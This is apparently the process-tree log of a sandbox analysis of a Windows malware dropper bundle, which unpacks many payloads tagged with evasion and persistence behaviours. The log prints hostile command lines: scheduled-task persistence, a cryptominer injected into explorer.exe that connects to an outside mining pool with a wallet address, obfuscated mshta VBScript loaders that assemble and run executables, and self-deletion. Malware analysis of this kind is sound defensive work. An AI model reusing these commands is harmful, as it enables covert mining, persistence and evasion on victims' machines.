- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--yry0yD"9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffd409cdec0,0x7ffd409cded0,0x7ffd409cdee010⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:210⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=1932 /prefetch:810⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2704 /prefetch:110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3012 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2572 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:210⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3800 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3256 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2120 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2132 /prefetch:810⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5880 -s 22768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6128 -s 22328⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13559beef6a5272.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13559beef6a5272.exeThu13559beef6a5272.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6490120.exe"C:\Users\Admin\AppData\Roaming\6490120.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6872999.exe"C:\Users\Admin\AppData\Roaming\6872999.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7127782.exe"C:\Users\Admin\AppData\Roaming\7127782.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\4187297.exe"C:\Users\Admin\AppData\Roaming\4187297.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3343953.exe"C:\Users\Admin\AppData\Roaming\3343953.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\719524.exe"C:\Users\Admin\AppData\Roaming\719524.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\2059768.exe"C:\Users\Admin\AppData\Roaming\2059768.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13045a98310.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13045a98310.exeThu13045a98310.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 3006⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu133bd09ec4755.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exeThu133bd09ec4755.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe"C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe" -u6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13fba7be709523c0e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exeThu13fba7be709523c0e.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp" /SL5="$1021C,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu131398a3143fefd0.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exeThu131398a3143fefd0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 18926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu132a7b862a0b8c3.exe /mixtwo4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exeThu132a7b862a0b8c3.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exeThu132a7b862a0b8c3.exe /mixtwo6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu132a7b862a0b8c3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu132a7b862a0b8c3.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13ce386e385.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exeThu13ce386e385.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscriPt: ClOsE ( cReaTeObJECt ( "WsCRIpT.SHeLl" ). run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If """" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe"" ) do taskkill -f /iM ""%~nXY"" " , 0, True ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "" =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe" ) do taskkill -f /iM "%~nXY"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt38⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscriPt: ClOsE ( cReaTeObJECt ( "WsCRIpT.SHeLl" ). run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If ""-Pnxy5pXvI8SWjtAt3 "" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" ) do taskkill -f /iM ""%~nXY"" " , 0, True ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "-Pnxy5pXvI8SWjtAt3 " =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" ) do taskkill -f /iM "%~nXY"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPt: cLosE ( CreAtEobJECt ( "wScRiPt.Shell" ). rUn ( "C:\Windows\system32\cmd.exe /R eCho | sEt /p = ""MZ"" > kjDH_4NN.HcN & copy /y /B KjDH_4NN.HcN + OCbMK.P + JWTDD.9 ..\YWdLrN.QC & START msiexec -Y ..\YwdlRn.qC & DeL /q * " , 0 , trUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R eCho | sEt /p = "MZ" >kjDH_4NN.HcN & copy /y /B KjDH_4NN.HcN + OCbMK.P + JWTDD.9 ..\YWdLrN.QC & START msiexec -Y ..\YwdlRn.qC& DeL /q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>kjDH_4NN.HcN"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\YwdlRn.qC11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /iM "Thu13ce386e385.exe"8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu133afc50de08.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133afc50de08.exeThu133afc50de08.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu132a4e95bb26a065.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exeThu132a4e95bb26a065.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exeC:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu134eb4d923e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu134eb4d923e.exeThu134eb4d923e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu138c8768d77029f.exe4⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe d6fd3dedd822f8a94baad1d7e76fc7ce 1FPS8FyOPkmM3Jgu9Ybc4Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exeThu138c8768d77029f.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-PO6NO.tmp\Thu138c8768d77029f.tmp"C:\Users\Admin\AppData\Local\Temp\is-PO6NO.tmp\Thu138c8768d77029f.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe"C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe" /SILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HUPMF.tmp\Thu138c8768d77029f.tmp"C:\Users\Admin\AppData\Local\Temp\is-HUPMF.tmp\Thu138c8768d77029f.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4312 -ip 43121⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 4562⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5504 -ip 55041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 6100 -ip 61001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 6128 -ip 61281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 5880 -ip 58801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1772 -ip 17721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6116 -ip 61161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 4092 -ip 40921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5652 -ip 56521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2852 -ip 28521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2632 -ip 26321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe d6fd3dedd822f8a94baad1d7e76fc7ce 1FPS8FyOPkmM3Jgu9Ybc4Q.0.1.0.3.01⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6244 -ip 62441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1456 -ip 14561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2184 -ip 21841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3692 -ip 36921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1244 -ip 12441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2104 -ip 21041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5896 -ip 58961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 416 -ip 4161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7104 -ip 71041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6612 -ip 66121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7DE2.exeC:\Users\Admin\AppData\Local\Temp\7DE2.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7DE2.exeC:\Users\Admin\AppData\Local\Temp\7DE2.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1488 -ip 14881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6580 -ip 65801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\92A3.exeC:\Users\Admin\AppData\Local\Temp\92A3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\92A3.exeC:\Users\Admin\AppData\Local\Temp\92A3.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\A5EE.exeC:\Users\Admin\AppData\Local\Temp\A5EE.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 2762⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\C0BA.exeC:\Users\Admin\AppData\Local\Temp\C0BA.exe1⤵
-
